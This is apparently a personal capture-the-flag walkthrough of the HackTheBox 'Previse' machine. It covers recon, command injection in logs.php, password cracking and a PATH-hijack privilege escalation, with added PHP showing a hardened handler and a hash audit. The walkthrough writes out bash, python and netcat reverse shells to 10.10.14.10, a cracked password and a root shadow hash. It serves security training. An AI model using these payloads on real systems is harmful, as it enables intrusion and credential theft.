Quick notes for Previse HTB machine
nmap -sV -sC 10.10.11.104
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-06 22:15 MST
Nmap scan report for 10.10.11.104
Host is up (0.085s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
| 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.01 seconds
echo "10.10.11.104 previse.htb" >> /etc/hosts
ffuf -u http://previse.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://previse.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php [Status: 200, Size: 2224, Words: 486, Lines: 54]
download.php [Status: 302, Size: 0, Words: 1, Lines: 1]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1]
footer.php [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php [Status: 200, Size: 980, Words: 183, Lines: 21]
favicon.ico [Status: 200, Size: 15406, Words: 15, Lines: 10]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
.htaccess [Status: 403, Size: 276, Words: 20, Lines: 10]
. [Status: 302, Size: 2801, Words: 737, Lines: 72]
.html [Status: 403, Size: 276, Words: 20, Lines: 10]
.php [Status: 403, Size: 276, Words: 20, Lines: 10]
status.php [Status: 302, Size: 2968, Words: 749, Lines: 75]
.htpasswd [Status: 403, Size: 276, Words: 20, Lines: 10]
.htm [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswds [Status: 403, Size: 276, Words: 20, Lines: 10]
nav.php [Status: 200, Size: 1248, Words: 462, Lines: 32]
accounts.php [Status: 302, Size: 3994, Words: 1096, Lines: 94]
files.php [Status: 302, Size: 4914, Words: 1531, Lines: 113]
.htgroup [Status: 403, Size: 276, Words: 20, Lines: 10]
wp-forum.phps [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.bak [Status: 403, Size: 276, Words: 20, Lines: 10]
.htuser [Status: 403, Size: 276, Words: 20, Lines: 10]
.ht [Status: 403, Size: 276, Words: 20, Lines: 10]
.htc [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess.old [Status: 403, Size: 276, Words: 20, Lines: 10]
.htacess [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [37050/37050] :: Job [1/1] :: 449 req/sec :: Duration: [0:01:20] :: Errors: 1 ::
curl -v -d "username=lanix13&password=mypass&confirm=mypass" http://previse.htb/accounts.php
I was then able to log in and go to the Files tab, where a siteBackup.zip is available for download.
mkdir siteBackup
cd siteBackup/
unzip ../siteBackup
Archive: ../siteBackup.zip
inflating: accounts.php
inflating: config.php
inflating: download.php
inflating: file_logs.php
inflating: files.php
inflating: footer.php
inflating: header.php
inflating: index.php
inflating: login.php
inflating: logout.php
inflating: logs.php
inflating: nav.php
inflating: status.php
In file_logs.php / logs.php there is something fun:
logs.php:$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
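That line hands the POST field to a shell unchanged, which is what the request further down in these notes takes advantage of. As an added example (not code from the backup), here is that pattern beside a hardened handler that checks the value against an allowlist and quotes it; the allowed delimiter names are an assumption, the script path is the one from the grep line:

```php
<?php
// Added example, not code from the siteBackup.zip: the delimiter handling
// from logs.php next to a hardened version. The allowed delimiter names
// are an assumption; the script path is the one shown in the grep line.

// Vulnerable shape, as found in logs.php: the raw POST value is spliced into
// a shell command string, so shell metacharacters in it are interpreted.
function buildCommandUnsafe(string $delim): string
{
    return "/usr/bin/python /opt/scripts/log_process.py {$delim}";
}

// Hardened version: accept only a fixed set of names, and still quote the
// value with escapeshellarg() as defence in depth.
const ALLOWED_DELIMS = ['comma', 'space', 'tab'];   // assumed set

function buildCommandSafe(string $delim): ?string
{
    if (!in_array($delim, ALLOWED_DELIMS, true)) {
        return null;                                 // reject, never execute
    }
    return '/usr/bin/python /opt/scripts/log_process.py ' . escapeshellarg($delim);
}

// Request handler: refuse with HTTP 400 instead of calling exec() on bad input.
function handleLogsRequest(array $post): array
{
    $cmd = buildCommandSafe((string) ($post['delim'] ?? ''));
    if ($cmd === null) {
        http_response_code(400);
        return ['ok' => false, 'error' => 'invalid delimiter'];
    }
    $output = [];
    $status = 0;
    exec($cmd, $output, $status);
    return ['ok' => $status === 0, 'output' => $output];
}

// Constructed test value with a shell separator in it, in the shape of the
// request later in these notes (a harmless command stands in for the payload).
$injected = 'comma&id';
echo buildCommandUnsafe($injected), PHP_EOL;       // two commands on one line
var_dump(buildCommandSafe($injected));             // rejected
var_dump(buildCommandSafe('comma'));               // accepted and quoted
```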
curl -v -d "username=lanix133&password=mypass" http://previse.htb/login.php
nc -lnvp 1234
curl -v -b "PHPSESSID=2qvup9fgetiqljd36jieg3gbhl" -d "delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.10/1234+0>%261'" http://previse.htb/logs.php
I had a basic shell and wanted to upgrade it; usually I can with this, but it didn't work in this case:
python -c 'import pty;pty.spawn("/bin/bash")'
So I went ahead and just spawned a new reverse shell using python:
nc -lvnp 6666
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Now in this new shell I could run mysql a little better:
nc -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 51970
bash: cannot set terminal process group (1400): Inappropriate ioctl for device
bash: no job control in this shell
www-data@previse:/var/www/html$ screen -list
screen -list
No Sockets found in /run/screen/S-www-data.
www-data@previse:/var/www/html$ mysql -u root -p < "show databases"
mysql -u root -p < "show databases"
bash: show databases: No such file or directory
www-data@previse:/var/www/html$ mysql -u root -p -e "show databases"
mysql -u root -p -e "show databases"
Enter password: mySQL_p@ssw0rd!:)
Database
information_schema
mysql
performance_schema
previse
sys
www-data@previse:/var/www/html$ mysql -u root -p previse -e "show tables;"
mysql -u root -p previse -e "show tables;"
Enter password: mySQL_p@ssw0rd!:)
Tables_in_previse
accounts
files
www-data@previse:/var/www/html$ mysql -u root -p previse -e "select * from accounts;"
mysql -u root -p previse -e "select * from accounts;"
Enter password: mySQL_p@ssw0rd!:)
id username password created_at
1 m4lwhere $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. 2021-05-27 18:18:36
2 loda123 $1$🧂llol$Nbgpw9CZswqpbpOCvtzzW1 2022-01-07 05:13:23
3 vector $1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1 2022-01-07 05:13:24
4 lanix13 $1$🧂llol$eTC00smlkY12Xcfpgowpq1 2022-01-07 05:29:49
5 bigbose $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// 2022-01-07 05:32:21
6 adrian $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// 2022-01-07 05:48:10
7 lanix133 $1$🧂llol$eTC00smlkY12Xcfpgowpq1 2022-01-07 05:59:04
www-data@previse:/var/www/html$
I took the hash for m4lwhere and used hashcat to crack it:
hashcat -m 500 previse.hash /usr/share/wordlists/rockyou.txt
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
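Two things stand out in that dump: every row carries the same salt (🧂llol), which is why bigbose/adrian and lanix13/lanix133 show identical hash strings, and the scheme is md5crypt ($1$, hashcat mode 500), which is cheap to run through a wordlist. As an added example (not part of the site's code), a small audit over the rows above plus the password_hash() replacement:

```php
<?php
// Added example (not part of the Previse site code): audit the accounts
// dump above for reused salts and identical hashes, then show how the
// same passwords should be stored. Rows are copied from the dump.
$rows = [
    ['m4lwhere', '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.'],
    ['loda123',  '$1$🧂llol$Nbgpw9CZswqpbpOCvtzzW1'],
    ['vector',   '$1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1'],
    ['lanix13',  '$1$🧂llol$eTC00smlkY12Xcfpgowpq1'],
    ['bigbose',  '$1$🧂llol$eBQMPwAvz9j9ZpK62qDI//'],
    ['adrian',   '$1$🧂llol$eBQMPwAvz9j9ZpK62qDI//'],
    ['lanix133', '$1$🧂llol$eTC00smlkY12Xcfpgowpq1'],
];

// Split a modular-crypt string "$id$salt$hash" into its three fields.
function splitCrypt(string $crypt): ?array
{
    $parts = explode('$', $crypt);
    if (count($parts) !== 4 || $parts[0] !== '') {
        return null;
    }
    return ['id' => $parts[1], 'salt' => $parts[2], 'hash' => $parts[3]];
}

// Report md5crypt ($1$) users, salts shared by several users, and
// hash strings shared by several users (same password, same salt).
function auditAccounts(array $rows): array
{
    $weak = $bySalt = $byHash = [];
    foreach ($rows as [$user, $crypt]) {
        $p = splitCrypt($crypt);
        if ($p === null) { continue; }
        if ($p['id'] === '1') { $weak[] = $user; }   // $1$ = md5crypt
        $bySalt[$p['salt']][] = $user;
        $byHash[$crypt][] = $user;
    }
    $shared = fn(array $u) => count($u) > 1;
    return [
        'md5crypt_users'   => $weak,
        'reused_salts'     => array_filter($bySalt, $shared),
        'identical_hashes' => array_filter($byHash, $shared),
    ];
}

print_r(auditAccounts($rows));

// The fix: password_hash() uses a strong algorithm with a fresh random salt
// per call, so equal passwords no longer yield equal rows.
$stored = password_hash('example-only', PASSWORD_DEFAULT);   // constructed value
var_dump(password_verify('example-only', $stored));
```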
I took that password and m4lwhere and attempted ssh, it worked!
$ ssh m4lwhere@previse.htb
The authenticity of host 'previse.htb (10.10.11.104)' can't be established.
ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'previse.htb' (ED25519) to the list of known hosts.
m4lwhere@previse.htb's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jan 7 06:22:56 UTC 2022
System load: 0.07 Processes: 184
Usage of /: 50.5% of 4.85GB Users logged in: 0
Memory usage: 25% IP address for eth0: 10.10.11.104
Swap usage: 0%
0 updates can be applied immediately.
Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
m4lwhere@previse:~$
m4lwhere@previse:~$ cat user.txt
ae1**************************
m4lwhere@previse:~$ sudo -l
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
cd /dev/shm
echo "nc 10.10.14.10 5555 -e /bin/bash" > gzip
nc -lvnp 5555
export PATH=/dev/shm:$PATH
sudo /opt/scripts/access_backup.sh
listening on [any] 5555 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.11.104] 59622
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
root.txt
cat root.txt
6e2c7***************
And final proof:
cat /etc/shadow
root:$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5WCKQSWn/a3HO/M/TjS/YC0Mk1:18824:0:99999:7:::